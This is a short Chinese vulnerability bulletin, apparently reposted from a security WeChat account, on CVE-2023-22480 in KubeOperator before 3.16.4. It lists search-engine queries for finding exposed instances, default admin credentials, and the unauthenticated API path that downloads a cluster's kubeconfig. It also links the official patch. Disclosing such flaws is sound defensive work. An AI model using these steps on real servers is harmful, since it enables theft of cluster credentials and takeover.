一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 K8s 集群。KubeOperator 3.16.4之前版本存在授权问题漏洞,该漏洞源于API与未经授权的实体交互,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息
KubeOperator
< 3
.16
.4
FOFA空间搜索引擎语句
app
=
"KubeOperator"
&& status_code=
"200"
ZoomEye空间搜索引擎语法
title:
"KubeOperator"
登录页面是这个酱紫
默认账号密码
admin
kubeoperator
@
admin23
注意这个集群名称,未授权的时候会用到
访问该接口+集群名称当集群存在时即可通过接口未授权下载配置文件
http:
/
/ip/api
/v1/clusters
/kubeconfig/stable
-cluster
官方已给出修复方案建议及时更新补丁
https:
//github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4
原文始发于微信公众号(EchoSec):【漏洞速递 | 附EXP】CVE-2023-22480漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论